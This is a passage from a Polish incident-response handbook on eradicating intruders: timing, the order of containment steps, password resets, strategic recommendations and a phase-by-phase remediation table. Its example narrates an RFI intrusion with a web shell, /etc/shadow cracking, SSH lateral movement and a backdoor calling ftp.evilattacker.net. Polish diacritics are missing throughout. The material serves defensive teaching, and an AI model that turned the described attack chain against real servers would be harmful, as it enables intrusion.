jest sposb wykonania kopii zapasowej danych uytkownikw i wanych informacji z systemw,
ktre maj zosta poddane przebudowie. Wikszo uytkownikw przechowuje w swoich
systemach informacje, ktre s im absolutnie niezbdne do pracy. Take administratorzy
systemw maj na serwerach dane, ktre trzeba skopiowa i przywrci po zakoczeniu procesu
likwidacji zagroenia. We wszystkich przypadkach, gdy trzeba wykona kopi zapasow danych
z systemu, na ktrym doszo do wamania, i przywrci j w nowym systemie, czonek zespou
naprawczego powinien dokadnie zbada katalogi i pliki, aby upewni si, e przez przypadek
wraz z nimi nie jest przenoszony wirus. W swojej praktyce nieraz spotykalimy sytuacje, w ktrych
firma przeprowadzajca proces likwidacji zagroenia o may wos sama z powrotem nie zarazia si
wirusem przez to, e wprowadzia szkodliwy program do nowego systemu wraz z kopi zapasow
potrzebnych plikw. Tylko dziki blokowaniu gronych adresw IP i kierowaniu szkodliwych

domen do czarnej dziury udawao si unikn ponownych kopotw mimo uruchomienia
szkodliwego programu przez uytkownika. Jeli dziaania przygotowawcze zostan wykonane
prawidowo, prba komunikacji szkodliwego programu z serwerem dowodzcym powinna zosta
zablokowana przez mechanizmy zabezpieczajce.
Jak napisalimy wczeniej, kluczem do powodzenia procesu likwidacji zagroenia jest odpowiednie
jego zaplanowanie. Jednak nawet najlepszy plan nie gwarantuje, e wszystko pjdzie gadko.
Dlatego zawsze naley mie te plan awaryjny okrelajcy sposb postpowania w przypadku
wystpienia najczciej spotykanych problemw.
Uytkownik uda si na urlop i nie zmienia hasa w przewidzianym czasie.
Konto uytkownika jest ju nieaktywne, ale nigdy nie zostao wyczone, wic haso nie jest
zmieniane.
Systemy nienalece do domeny w wikszoci przypadkw nie podlegaj systemowi
masowej zmiany hase.
Istniej lokalne konta uytkownikw z prawami administratora, niebdce standardowymi
lokalnymi kontami administracyjnymi.
Gdy zesp naprawczy opracuje plan dziaania, powinien skontaktowa si z dyrekcj w celu
okrelenia najlepszego czasu na jego przeprowadzenie. W nastpnym podrozdziale opisujemy
kwestie dotyczce czasu wdraania planu likwidacji zagroenia i strategii jego wykonywania.
WYBR MOMENTU WYKONANIA PLANU

LIKWIDACJI ZAGROENIA I JEGO WDRAANIE
Czas przeprowadzenia procesu likwidacji ma kluczowe znaczenie dla caego przedsiwzicia. Jeeli
si za bardzo pospieszymy, zesp ledczy moe nie okreli w peni zakresu incydentu. W efekcie
naprawa moe si nie powie, poniewa nie uda si cakowicie wyrugowa intruza ze rodowiska
(np. zostan przeoczone jakie tylne drzwi). Jeli proces eradykacji zostanie przeprowadzony zbyt
pno, haker moe zdy zmieni narzdzia, taktyk i procedury albo po prostu zrealizowa
do koca swj plan. Jeli intruz zmieni taktyk i narzdzia, zesp ledczy musi je ponownie
rozpracowa. A jeli haker osignie zamierzone cele, firma poniesie strat (cho skutki tego mog
nie by odczuwalne od razu tak jest np. w przypadku kradziey wasnoci intelektualnej).
Idealnym czasem na przeprowadzenie procesu likwidacji zagroenia jest moment po tym,
jak zesp ledczy okreli zasig incydentu i zesp naprawczy wdroy wszystkie lub wikszo
punktw planu ograniczania dziaalnoci hakera i przygotuje si do nastpnego etapu. Prawidowe
okrelenie zasigu incydentu oznacza, e zesp ledczy rozpracowa wikszo narzdzi oraz
procedur hakera i potrafi niezawodnie rozpoznawa szkodliw dziaalno. W firmie Mandiant
idealny czas do przeprowadzenia procesu eradykacji nazywamy stref uderzeniow (ang. strike
zone). Strefa ta to moment, w ktrym mamy odpowiedni wiedz do przeprowadzenia akcji.
Koncepcj t przedstawiono na rysunku 17.2.
RYSUNEK 17.2. Strefa uderzeniowa, czyli idealny moment do przeprowadzenia procesu likwidacji zagroenia
Nieatwo wyczu odpowiedni moment do rozpoczcia procesu to bardziej sztuka ni nauka.

Zasadniczo sygnaami dla nas, e zbliamy si do strefy uderzeniowej lub e si w niej znajdujemy,
s nastpujce znaki.
Zesp ledczy stwierdza, e dobrze rozpozna rodowisko, ktre pado ofiar hakera,
oraz e rozpracowa jego metody dziaania i narzdzia.
Liczba systemw ze zamanymi zabezpieczeniami wykrywanych dziennie
(lub przez inny okres) znacznie spada.
Wikszo wykrywanych systemw ze zamanymi zabezpieczeniami zawiera znane ju
wskaniki zagroenia.
Zakoczy si proces dokadnego planowania procesu naprawczego.
Jak wida, jeli rodowisko nie jest jeszcze dobrze rozpoznane albo nie skonstruowano
skutecznych mechanizmw wykrywania zagroe, trudno stwierdzi, czy jest si ju w strefie
uderzeniowej, poniewa brakuje pierwszej czci ukadanki, tzn. wiedzy na temat metod i narzdzi
wykorzystywanych przez hakera.
Niektre organizacje wol poczeka, a zesp ledczy zbliy si do zakoczenia prac i dopiero
wtedy rozpoczynaj planowanie procesu cakowitej likwidacji zagroenia. Nie jest to najlepsze
podejcie, poniewa czsto zmusza do popiechu, przez ktry atwo przegapi stref uderzeniow.
Planowanie procesu eradykacji powinno si zaczyna natychmiast po tym, jak lider incydentu
wybierze metod naprawy (natychmiastow, opnion czy czon). W trakcie trwania ledztwa
plan ten naley traktowa jako cigle niedokoczony i trzeba go zrewidowa za kadym razem, gdy
zostan odkryte jakie nowe fakty. Moe si wydawa, e wymaga to dodatkowej pracy, z ktrej
poytek jest aden lub niewielki, ale z dowiadczenia wiemy, e wczesne planowanie zapewnia
lepsz skuteczno procesu eradykacji.
O momencie wdroenia procesu likwidacji zagroenia nie naley decydowa, gdy lider
incydentu uzna, e wanie osignito stref uderzeniow. Zamiast tego, liderzy incydentu,
ledztwa i procesu naprawczego powinni uzgodni wstpn dat jeszcze w czasie trwania ledztwa
i procesu naprawczego. Celem jest wybranie daty nalecej do strefy uderzeniowej, cho moment
wejcia do niej bardzo trudno przewidzie (dlatego nazywamy to bardziej sztuk ni nauk). Niektre
organizacje wyznaczaj odlege przysze daty, aby mie czas na odpowiednie przygotowanie si,
cho w ten sposb ryzykuj spnienie. Najskuteczniejszym sposobem na wybranie odpowiedniego
momentu do przeprowadzenia procesu eradykacji jest wyznaczenie terminu trudnego do dotrzymania,
a nastpnie zmuszenie rnych zespow do wytonej pracy.
W miar moliwoci staraj si nie przekroczy wyznaczonego terminu eradykacji. Z dowiadczenia
wiemy, e gdy ju raz si ten termin przeoy, pracownicy zaczynaj traci poczucie presji czasowej,
co moe mie niekorzystne skutki. Bylimy nawet wiadkami odkadania daty procesu likwidacji
zagroenia w nieskoczono, a bdziemy lepiej przygotowani, aby zyska czas na wdroenie
zalece. Wad tego sposobu mylenia jest to, e naprawd nigdy nie mona by w peni gotowym
do rozwizania problemu z incydentem bezpieczestwa komputerowego. Lepiej zrobi cokolwiek
ni nic. Poza tym, gdy minie termin przeprowadzenia procesu eradykacji, decydentom atwiej
pozby si trudniejszych punktw planu, aby rozpocz akcj. Z dowiadczenia wiemy, e najczciej
dotyczy to zmiany hase do kont uytkownikw. Jeli raz pozwolisz przeoy dat, istnieje due
prawdopodobiestwo, e zrobisz to ponownie.
Likwidacja zagroenia ma zazwyczaj charakter procesowy jego przebieg skada si z wdroenia
wczeniej zaplanowanych dziaa w okrelonej kolejnoci i sprawdzenia, czy wszystko si udao.
Im lepiej zaplanowano t akcj, tym atwiej bdzie j przeprowadzi. Poniej znajduje si lista
piciu przykadowych czynnoci, jakie mona by wykona w procesie eradykacji:
odczenie internetu;
blokowanie znanych szkodliwych adresw IP i odsyanie do czarnej dziury
szkodliwych domen;
usunicie z sieci systemw, w ktrych doszo do wamania, i ich przebudowa;
zmiana hase do wszystkich kont uytkownikw;
weryfikacja powodzenia wszystkich dziaa.
Punkty planu likwidacji zagroenia powinny by realizowane w okrelonej kolejnoci. Znaczy
to, e pierwsz czynnoci w tym procesie bdzie odczenie organizacji od internetu przez dzia
sieciowy. Nastpnie powinny zosta wczone blokady adresw IP na wszystkich routerach
granicznych oraz powinien zosta wczony blackholing DNS na wszystkich zewntrznych
serwerach DNS. Administratorzy sieci powinni dokadnie sprawdzi, czy internet jest cakowicie
odcity oraz czy blokada adresw IP i blackholing dziaaj prawidowo we wszystkich miejscach.
Dobrym sposobem na sprawdzenie tych rzeczy jest otwarcie kilku legalnych stron internetowych,
sprbowanie nawizania poczenia FTP (lub przy uyciu innego czsto wykorzystywanego
protokou) oraz podjcie prby poczenia si ze znanymi szkodliwymi adresami IP ze wszystkich
miejsc posiadajcych wasne kocwki internetowe. Testy te powinny zosta wykonane we wszystkich
najwaniejszych lokalizacjach geograficznych lub logicznych, aby sprawdzi, czy bd spowoduje
porak caej akcji. Wiedz te, e samo wysanie polecenia ping do legalnych i szkodliwych domen
lub adresw IP nie jest dobrym testem, poniewa pakiety ICMP mog by traktowane inaczej
ni pakiety TCP/UD, przez co wynik moe by faszywy. Jednym ze sposobw na sprawdzenie,
czy skutecznie odcito poczenia internetowe, czy listy ACL prawidowo blokuj dostp do
okrelonych adresw IP oraz czy blackholing DNS dziaa zgodnie z oczekiwaniami, jest uycie
narzdzi sieciowych netcat i nmap. Wikszo organizacji obok blokowania adresw IP
i blackholingu DNS dodatkowo wcza mechanizmy alarmujce o prbach dostpu do
szkodliwych adresw IP i domen. Jest to dobre posunicie, poniewa pozwala wykry wczeniej
przeoczone systemy zawierajce szkodliwe oprogramowanie (ktre jednak dziki wdroonym
blokadom powinno by unieszkodliwione).
Po zakoczeniu etapu sieciowego administratorzy systemw i aplikacji mog rozpocz akcj
naprawcz w systemach, ktre pady ofiar hakera. Najczciej polega ona na przebudowaniu tych
systemw lub skrupulatnym usuniciu szkodliwego oprogramowania zgodnie z instrukcjami
dostarczonymi przez zesp ledczy. Jeli systemy maj by przebudowywane, naley bardzo
ostronie przenosi dane do wieych instalacji, poniewa wraz z nimi przez przypadek mona
przenie wirusy. Wprawdzie wczeniej wdroone blokady sieciowe powinny uniemoliwi
wirusowi komunikacj z serwerem dowodzcym, ale zawsze istnieje ryzyko, e co przeoczono.
Jest to jeden z powodw, dla ktrych punkty planu likwidacji zagroenia powinno si wykonywa
w cile okrelonej kolejnoci. Poza tym, adnego z tych punktw nie mona pomin, aby mie
wszystkie atuty po swojej stronie.
Ostrzeenie Czasami klienci pytaj nas, czy oczyszczenie systemu, w ktrym doszo do wamania, jest
wystarczajcym rodkiem zaradczym. Jednak kasowanie znanych szkodliwych programw nie
jest zalecane, poniewa nie mona mie pewnoci, e udao si odkry wszystkie takie programy.
Najlepszym rozwizaniem jest odbudowanie systemw z bezpiecznego czystego nonika, cho
oczywicie czasami nie ma innego wyjcia, tylko trzeba wykona zwyke czyszczenie. Jest tak
np. w przypadku serwerw produkcyjnych, ktrych odczenie od sieci spowodowaoby spadek
przychodw firmy, lub gdy haker zainfekuje setki albo tysice systemw.
Po odczeniu systemw od sieci administratorzy mog przystpi do akcji zmieniania hase

do kont uytkownikw. Wczeniej napisalimy, e kluczem do powodzenia planu eradykacji jest
wykonywanie jego punktw w cile okrelonej kolejnoci. Gdy jednak wykonamy opisane
wczeniej czynnoci i wyczymy lub odczymy od internetu systemy, w ktrych doszo do
zamania zabezpiecze, haker nie powinien mie ju dostpu do rodowiska. Wwczas moemy
przej do nastpnego punktu planu. Innymi sowy, nie trzeba czeka na przebudowanie
wszystkich zainfekowanych systemw z rozpoczciem zmieniania hase do kont uytkownikw
wystarczy tylko odczy od sieci (take Wi-Fi) odpowiednie systemy. To pozwala troch skrci
czas trwania procesu likwidacji zagroenia. Jak ju pisalimy, zmiana hase do kont uytkownikw
moe by najtrudniejszym punktem planu i jego wdroenie moe wymaga najwicej czasu.
Poza tym w czasie przeprowadzania tej operacji ma miejsce najwicej niespodziewanych zdarze,
wic naley rozpocz j tak szybko, jak to moliwe.
Ostatni punkt przedstawionego planu eradykacji zagroenia zakada weryfikacj skutecznoci

wczeniej przeprowadzonych dziaa potem mona przywrci poczenie z internetem.
Przeprowadzenie weryfikacji, czy wszystkie szkodliwe programy zostay usunite z zainfekowanych
systemw, polega na poszukaniu w nich wskanikw zagroenia dowoln metod, ktra bya
wykorzystywana podczas ledztwa. Czsto na etapie tym udaje si wykry dodatkowe systemy,
ktre wczeniej zostay przeoczone, nieprawidowo odbudowane lub w ogle nieodbudowane.
Z naszego dowiadczenia wynika, e niektrzy administratorzy prbuj oszczdza czas przez
usuwanie szkodliwych programw z systemw, zamiast przebudowywa te systemy od nowa
(niezalenie od tego, jakie otrzymali polecenie). W komputerach nadal mog by obecne
pozostawione przez wirusy lady, np. w postaci kluczy rejestru lub plikw konfiguracyjnych
w systemie plikw, ktre atwo wykry podczas szukania wskanikw zagroenia. W kocu
weryfikacja, czy zostay zmienione hasa do wszystkich kont uytkownikw, jest bardzo atwa.
Jeli organizacja korzysta z usug Microsoft Active Directory, zesp naprawczy moe bez
problemu sprawdzi, czy wszystkie hasa zostay uniewanione lub zmienione za pomoc
przeznaczonych do tego narzdzi. Aby upewni si, e zmienione zostay te hasa lokalnych
administratorw, baz danych i aplikacji, naley zaangaowa samych administratorw.
Podczas procesu eradykacji kluczowe znaczenie ma komunikacja. Musi by skuteczna, aby
poszczeglne grupy administratorw wiedziay, kiedy mog przej do kolejnego etapu oraz kiedy
zostay zakoczone poprzednie etapy prac. Ponadto administratorzy musz mie moliwo
informowania odpowiednich osb o napotykanych problemach, aby uzyska pomoc. Poza tym
nawet najlepszy plan nie chroni przed niespodziewanymi trudnociami, wic skuteczna
komunikacja jest niezbdna do tego, by szybko reagowa na problemy, ktre w przeciwnym
przypadku mog nawet przyczyni si do niepowodzenia caej operacji.
Lider procesu naprawczego powinien zadba o zapewnienie odpowiednich rodkw
porozumiewania si jeszcze przed rozpoczciem procesu eradykacji. rodki te powinny by
dostpne przez cay czas trwania akcji. Jednym z rozwiza jest okrelenie godzin w cigu dnia,
w ktrych wszyscy administratorzy i czonkowie zespou naprawczego mog ze sob rozmawia,
aby omwi postp prac. Inn moliwoci jest utrzymywanie poczenia konferencyjnego przez
cay czas trwania akcji, aby pracownicy na bieco mogli przekazywa i odbiera najwiesze
informacje.
Zesp ds. likwidacji zagroenia zawiera wicej osb ni zesp naprawczy. Zazwyczaj w jego
skad wchodz administratorzy sieci, systemw i aplikacji, ktrzy dziaaj zgodnie z wytycznymi
przekazywanymi przez zesp naprawczy. Nie wszyscy czonkowie zespou naprawczego musz
bra udzia take w procesie eradykacji. Przykadowo udzia specjalistw od PR, zasobw ludzkich
i prawnikw nie jest wymagany. Natomiast powinni by obecni wszyscy przedstawiciele specjalnoci
technicznych. Ponadto po zakoczeniu procesu likwidacji zagroenia pracownicy pomocy
technicznej powinni by w kontakcie z zespoem naprawczym, na wypadek gdyby pojawiy si
zgoszenia dotyczce podejrzanej aktywnoci lub awarii aplikacji.
FORMUOWANIE ZALECE STRATEGICZNYCH

Zalecenia strategiczne opisuj czynnoci, od wykonania ktrych zaley oglna kondycja zabezpiecze
organizacji, ale ktrych nie mona wdroy przed procesem eradykacji ani po nim. Wrd przykadw
takich zalece mona wymieni uaktualnienie systemw operacyjnych w caym rodowisku,
redukcj uprawnie uytkownikw, segmentacj sieci oraz wdroenie filtrw ruchu wychodzcego.
Zalecenia strategiczne s z gruntu trudne do wcielenia w ycie, poniewa zazwyczaj wymagaj
duych zmian, ale jednoczenie pozwalaj znacznie zwikszy poziom bezpieczestwa organizacji.
Zalecenia strategiczne z reguy formuuje si podczas dwch pierwszych faz procesu naprawczego.
Przykadowo czonek zespou naprawczego moe opracowa dokadny plan segmentacji sieci,
aby uniemoliwi hakerom dostp do wybranej czci rodowiska. Plan ten moe wymaga
przeniesienia kluczowych danych na kilka serwerw, a nastpnie umieszczenia tych serwerw
w rodowisku o ograniczonym dostpie. Ponadto moe by konieczne zdefiniowanie danych
powiadczajcych oraz wczenie uwierzytelniania dwuskadnikowego dla uytkownikw, ktrzy
potrzebuj chronionych w ten sposb danych. Wdroenie tych wszystkich zalece z pewnoci
bdzie wymagao duej iloci czasu, planowania oraz zasobw. Akcja ta jest doskonaym
zaleceniem, poniewa jej przeprowadzenie bdzie korzystne dla bezpieczestwa organizacji, cho
nie da si jej przeprowadzi w krtkim czasie. Przed zakoczeniem procesu likwidacji zagroenia
zesp naprawczy nie powinien powica zbyt duo czasu na opracowywanie zalece strategicznych.
Podczas ich formuowania czonkowie zespou powinni skupia si tylko na oglnych dziaaniach.
Szczegy wprowadzania zalecanych zmian powinny zosta okrelone przez zespoy ludzi z rnych
dziaw powoane specjalnie do opracowania szczegowego planu wdroenia zalece.
Czonkowie tych zespow musz mie specjalistyczn wiedz potrzebn do planowania
i wdraania dziaa strategicznych.
Zesp naprawczy powinien skrupulatnie zapisywa wszystkie zalecenia strategiczne, nawet
jeli jest maa szansa na ich realizacj. Decydenci po duszym namyle mog doj do wniosku,
e jednak warto wprowadzi take te bardziej skomplikowane zmiany. Czasami te dyrekcja firmy
moe zada przedstawienia propozycji i wybra te, ktrych wprowadzenie przyniesie najwicej
korzyci. Dlatego na pocztku listy zalece strategicznych zawsze powinny znajdowa si punkty
najwaniejsze dla zwikszenia poziomu bezpieczestwa organizacji.
Po zakoczeniu wdraania wszystkich czynnoci naprawczych pozostaje do zrobienia jeszcze
jedna rzecz wycignicie wnioskw z zaistniaej sytuacji. W nastpnym podrozdziale piszemy,
dlaczego to takie wane.
DOKUMENTACJA ZDOBYTEGO DOWIADCZENIA

Zdobyte dowiadczenie powinno si opisywa po kadej wikszej akcji naprawczej. To, czym jest
wiksza akcja naprawcza, musi zosta zdefiniowane w samej organizacji, ale generalnie mona
powiedzie, e powinno si sporzdza dokumentacj zdobytego dowiadczenia po kadej akcji
naprawczej, w ktr zaangaowane byy znaczne rodki i ktra wymagaa dokadnego planowania.
Proste przypadki, takie jak przebudowa jednego systemu z powodu wykrycia w nim wirusa,
nie wymagaj opisywania.
Spostrzeenia poczynione w procesie naprawy powinno si opisywa w dokumencie

o standardowym formacie przechowywanym w atwo dostpnym miejscu. Struktura tego szablonu
powinna umoliwia spjne przedstawianie informacji z rnych przypadkw. Ponadto dane
powinno da si atwo przeglda i przeszukiwa, musz by opatrzone znacznikami, podzielone
na kategorie itd. W ten sposb unika si te duplikowania opisw takich samych spostrzee.
Doskonaym miejscem do przechowywania takiej dokumentacji s strony wiki i systemy do
zarzdzania dokumentami.
Przykadem sytuacji, w ktrej warto sporzdza notatki, jest zmiana hase do wszystkich
kont uytkownikw (katalogowych, systemowych i aplikacji) w caym przedsibiorstwie.
Aby przeprowadzi t akcj, zesp naprawczy musi przezwyciy wiele technicznych
i nietechnicznych trudnoci. Do technicznych problemw zalicza si np. zmian wszystkich
hase w systemie Unix, gdy dany katalog jest nieuywany, wygenerowanie niepowtarzalnych hase
dla lokalnych kont administratorw w systemach Microsoft Windows, znalezienie wszystkich
skryptw i aplikacji zawierajcych wpisane na stae hasa i nazwy uytkownika oraz znalezienie
wszystkich kont usugowych. Natomiast wrd nietechnicznych trudnoci mona wymieni
identyfikacj wszystkich systemw, aplikacji i skryptw w rodowisku, w ktrym uywane s
konta uytkownikw, zdobycie przychylnoci kierownictwa i innych decydentw oraz nakonienie
zwykych uytkownikw do zastosowania si w peni do przedstawionych im zalece.
Sporzdzenie dokumentacji z przeprowadzonych czynnoci i zapisanie jej wraz z uytymi do
ich przeprowadzenia skryptami pozwala znacznie skrci czas planowania kolejnych akcji zmiany
hase i nazw uytkownikw w caym przedsibiorstwie. Dokumentacj tak powinno si sporzdzi
jak najszybciej po zakoczeniu procesu naprawczego, aby notatki byy najwiesze i dziki temu
dokadne. Nieraz bylimy wiadkami, jak zespoy naprawcze zwlekay z opisem zdobytych dowiadcze
kilka dni, a nawet tygodni. Po takim czasie mona zapomnie o wielu wanych informacjach oraz
mie trudnoci ze zdobyciem ich od rnych czonkw zespou. Lider procesu naprawczego
powinien wyranie da do zrozumienia, e sporzdzenie dokumentacji przeprowadzonych
czynnoci jest obowizkow czci caej akcji naprawczej. Postawienie sprawy w ten sposb jest
zacht dla czonkw zespou do sporzdzania notatek w czasie pracy, dziki czemu pniej atwo
wszystko opisa.
Uwaga Wydaje si to oczywiste, ale musimy wyranie podkreli, e danych dotyczcych poprzednich
ledztw nie naley przechowywa w systemach podczonych do domen i katalogw korporacyjnych.
Informacje na temat sposobu dziaania zespou RI mogyby zosta wykorzystane przez hakerw.
Jeli jednak z pewnych powodw musz one by przechowywane w miejscu z dostpem do internetu,
najlepiej umieci je na niezalenych serwerach obsugiwanych przez czonkw zespou RI.
Znasz ju wszystkie osiem etapw procesu naprawczego, wic pora na przyjrzenie si

oglnemu przykadowi ich przeprowadzenia. W nastpnym podrozdziale czymy punkty procesu
naprawczego z etapem planowania, aby pokaza moliwy sposb prowadzenia akcji naprawczej.
PODSUMOWANIE
Proces naprawy jest trudny do przeprowadzenia, poniewa w jego trakcie moe mie miejsce
wiele zdarze pozostajcych cakowicie poza nasz kontrol. W firmie Mandiant jako podstawy
do sporzdzania dokadnego planu naprawczego wykorzystujemy pojcia cyklu ataku i tabeli
planowania procesu naprawczego. Pojcie cyklu ataku powiniene ju zna, poniewa
wprowadzilimy je w 1. rozdziale. Tabela planowania procesu naprawczego jest nowoci, wic
opisujemy j poniej. Obie te koncepcja zdefiniowalimy po to, by jak najlepiej opisywa rne fazy
ataku oraz uatwi sobie tworzenie planu naprawczego uwzgldniajcego wszystkie zaatakowane
obszary. Przypominamy, e cykl ataku w wikszoci przypadkw obejmuje siedem obszarw
funkcjonalnych. Oczywicie nie zawsze s one wszystkie zaangaowane, ale oglnie schemat ten
da si zaadaptowa do opisu kadego incydentu. Poniej znajduje si schemat przedstawiajcy
cykl ataku.
Konstrukcj kompletnego planu naprawczego, na podstawie ktrego mamy walczy z hakerem

w niektrych lub wszystkich obszarach opisanych w cyklu ataku, atwiej przedstawi po podzieleniu
incydentu na siedem obszarw funkcjonalnych. W firmie Mandiant posugujemy si ponisz
tabel planowania procesu naprawy.
Pocztkowe Ustanowienie Zapewnienie

Zwikszenie Rekonesans Szperanie Zakoczenie
stadium punktu nieprzerwanego
uprawnie wewntrzny w rodowisku misji
wamania wejcia dostpu
Zapobieganie
Wykrywanie
Reakcja
Tabela ta pomaga nam w planowaniu mechanizmw ochrony przed zagroeniami (zapobieganie),

wykrywaniu aktywnoci hakera (wykrywanie) oraz usuwaniu zagroenia ze rodowiska (reakcja).
Koncentrujc uwag na kadym z tych trzech obszarw dla poszczeglnych faz cyklu ataku
(reprezentowanych w tabeli przez kolumny) i rozumiejc cele kadej reakcji na incydent,
zesp naprawczy moe sporzdzi szczegowy plan rozwizania najbardziej palcych problemw
z bezpieczestwem organizacji. Ponadto tabela ta uatwia sporzdzanie lunej listy wszystkich zalece,
jakie przyjd czonkom zespou do gowy, ktr pniej mona dokadnie przejrze i zrewidowa.
Uwaga Kluczowe znaczenie ma rozpoznanie najwaniejszego zasobu, tzn. tego, co ma by chronione.

Wyrnia si trzy rodzaje kluczowych zasobw: dane, ludzi i systemy. Posiadanie tej wiedzy zwiksza
szanse na przeprowadzenie skutecznej akcji naprawczej i skupienie si na odpowiednich celach.
Przeanalizujemy przykad wykorzystania koncepcji cyklu ataku i tabeli planowania procesu

naprawy. Powiedzmy, e haker przeprowadzi atak polegajcy na wykorzystaniu luki pozwalajcej
na wysanie pliku (ang. Remote File Inclusion RFI) do publicznie dostpnego serwera typu LAMP
(Linux, Apache, MySQL i PHP). Zoczyca wysa na serwer konsol sieciow dajc do niego dostp
z uprawnieniami konta uytkownika serwera Apache. Konto to naley do grupy uprzywilejowanych
uytkownikw z uprawnianiami uytkownika root. Haker pobra plik /etc/shadow, zama sabe
haso uytkownika root, a nastpnie przy uyciu tego konta i SSH wama si do innych systemw
znajdujcych si w strefie DMZ, zaczynajc od bazy danych zaplecza. Ponadto haker zainstalowa
w systemie tylne drzwi komunikujce si z serwerem dowodzcym pod adresem ftp.evilattacker.net
za pomoc protokou TCP na porcie 53. Nie udao mu si jednak zdoby dostpu do rodowiska
wewntrznego, poniewa firma zastosowaa prawidow segmentacj. Na rysunku 17.3 przedstawiono
schemat obrazujcy opisane zdarzenie.
RYSUNEK 17.3. Przykad wamania metod RFI
Wykorzystamy nasz tabel planowania procesu naprawy w tej sytuacji. Poniej wypisujemy list
wszystkich faz cyklu ataku. Najpierw przedstawiamy krtkie streszczenie wiadomoci o zaistniaym
zdarzeniu w danej fazie, a nastpnie podajemy list pomysw w odniesieniu do kadej kategorii z tabeli.
Faza 1. Pocztkowe stadium wamania haker wykorzysta luk RFI.
Zapobieganie dokadne przejrzenie kodu, naprawa niebezpiecznych czci,
usunicie ladw pozwalajcych zidentyfikowa wersj serwera.
Wykrywanie wdroenie zapory ogniowej dla aplikacji sieciowych lub innego
systemu wykrywania wama w celu monitorowania szkodliwej aktywnoci zwizanej
z aplikacjami sieciowymi.
Reakcja zarzdzenie dokadnych inspekcji kodu.
Faza 2. Ustanowienie punktu wejcia haker utworzy konsol sieciow na serwerze.

Zapobieganie ograniczenie moliwoci uytkownika Apache do tworzenia plikw
tylko w wybranych katalogach oraz uniemoliwienie wykonywania jakichkolwiek
skryptw z tych katalogw.
Wykrywanie wdroenie hostowego systemu wykrywania wama, np. Tripwire,
do monitorowania zmian w systemie plikw.
Reakcja usunicie szkodliwych plikw z systemu.
Faza 3. Zwikszenie uprawnie haker, korzystajc z uprawnie konta uytkownika
Apache, zdobywa plik /etc/shadow i amie sabe haso do konta uytkownika root.
Zapobieganie odebranie uprawnie uytkownika root uytkownikowi Apache,
uruchomienie serwera Apache w rodowisku ograniczonym, ustawienie silnego hasa
do konta uytkownika root oraz zastosowanie niepowtarzalnych hase do kont root
we wszystkich systemach w strefie DMZ.
Wykrywanie wdroenie hostowego systemu wykrywania wama, np. Tripwire,
do monitorowania zmian w systemie plikw.
Reakcja zmiana hase do kont wszystkich uytkownikw we wszystkich systemach
w strefie DMZ oraz zmiana hasa do konta uytkownika root we wszystkich systemach
w strefie DMZ.
Faza 4. Rekonesans wewntrzny haker wyszuka inne systemy prawdopodobnie
za pomoc skanowania portw lub masowego wykonania polecenia ping w podsieci.
Zapobieganie wdroenie list ACL w celu ograniczenia moliwoci komunikacji
midzy systemami wycznie do portw wykorzystywanych w dziaalnoci biznesowej.
Wykrywanie implementacja systemu wykrywania wama z reguami monitorujcymi
ruch midzy systemami niemajcy zwizku z dziaalnoci biznesow.
Reakcja brak.
Faza 5. Szperanie w rodowisku haker zalogowa si w zdalnych systemach przy uyciu
konta root i SSH.
Zapobieganie wyczenie moliwoci zdalnego logowania si uytkownika root,
implementacja list ACL w celu ograniczenia moliwoci komunikacji midzy systemami
wycznie do portw wykorzystywanych w dziaalnoci biznesowej, ustawienie silnego
hasa do konta uytkownika root oraz ustawienie niepowtarzalnych hase do konta root
we wszystkich systemach nalecych do strefy DMZ.
Wykrywanie implementacja systemu wykrywania wama z reguami monitorujcymi
ruch midzy systemami niemajcy zwizku z dziaalnoci biznesow.
Reakcja sprawdzenie we wszystkich systemach nalecych do podsieci,
czy nie zawieraj ladw przeprowadzonego rekonesansu wewntrznego.
Faza 6. Podtrzymanie obecnoci w rodowisku haker instaluje tylne drzwi w systemie.

Zapobieganie wdroenie rozwizania grsecurity/PAX w celu zapobiegania atakom
polegajcym na wstrzykiwaniu kodu, rozwizania SELinux w celu wzmocnienia ogranicze
zabezpieczajcych oraz wyczenie moliwoci czenia si przez systemy ze strefy DMZ
z systemami na zewntrz.
Wykrywanie implementacja hostowego systemu wykrywania wama, np. Tripwire,
w celu monitorowania zmian w systemie plikw oraz wdroenie sieciowego systemu
wykrywania wama nastawionego na wykrywanie pocze wychodzcych z systemw
znajdujcych si w strefie DMZ.
Reakcja usunicie szkodliwych plikw z systemu i zablokowanie pocze
ze szkodliw domen.
Faza 7. Zakoczenie misji w przykadzie tym nie wiadomo, jakie s cele hakera.
Zapobieganie brak danych.
Wykrywanie brak danych.
Reakcja brak danych.
Ponisza lista przedstawia wszystkie moliwoci naprawy sytuacji, jakie zgoszono w czasie
przeprowadzonej burzy mzgw:
ukrycie wersji serwera sieciowego;
naprawa niebezpiecznego kodu;
przeprowadzenie dokadnej inspekcji kodu;
wdroenie zapory sieciowej lub innego systemu wykrywania wama ustawionego
na wykrywanie szkodliwej aktywnoci zwizanej z dziaaniem aplikacji sieciowych;
wyczenie uytkownikowi Apache moliwoci tworzenia plikw w wybranych katalogach;
implementacja hostowego systemu wykrywania wama (np. Tripwire do wykrywania
zmian w systemie plikw) w celu monitorowania zmian w systemie plikw;
usunicie szkodliwych plikw z sytemu;
odebranie uprawnie uytkownika root uytkownikowi Apache;
uruchomienie serwera Apache w rodowisku ograniczonym;
ustawienie silnych hase uytkownikom o wysokich uprawnieniach;
ustawienie niepowtarzalnych hase do kont uytkownikw root w systemach nalecych
do strefy DMZ;
zmiana hase do wszystkich kont uytkownikw we wszystkich systemach nalecych
do strefy DMZ;
implementacja list ACL w celu ograniczenia moliwoci systemw w zakresie komunikacji
midzy sob z wyjtkiem wybranych portw uywanych do prowadzenia dziaalnoci;
wdroenie regu wykrywania zagroenia monitorujcych niezwizany z dziaalnoci

jednostki ruch midzy systemami;
implementacja systemu wykrywania wama nastawionego na monitorowanie pocze
wychodzcych z systemw znajdujcych si w strefie DMZ;
wyczenie moliwoci zdalnego logowania na konto uytkownika root;
przeszukanie wszystkich systemw znajdujcych si w podsieci pod ktem wystpowania
ladw przeprowadzonego rekonesansu wewntrznego;
wyczenie moliwoci czenia si systemw ze strefy DMZ z systemami zewntrznymi;
blokowanie pocze ze szkodliw domen.
W tym momencie zesp musi zdecydowa, ktre punkty wdroy i na jakim etapie oglnej
strategii procesu naprawczego. W omawianym przypadku lider incydentu prawdopodobnie
zdecydowaby si na dziaanie opnione. Pamitaj, e w chwili planowania metody dziaania lider
incydentu zazwyczaj nie dysponuje pen wiedz na temat zakresu zdarzenia. Dlatego opnione
dziaanie jest z reguy najbezpieczniejszym wyjciem, zwaszcza gdy lider uzna, e incydent jest
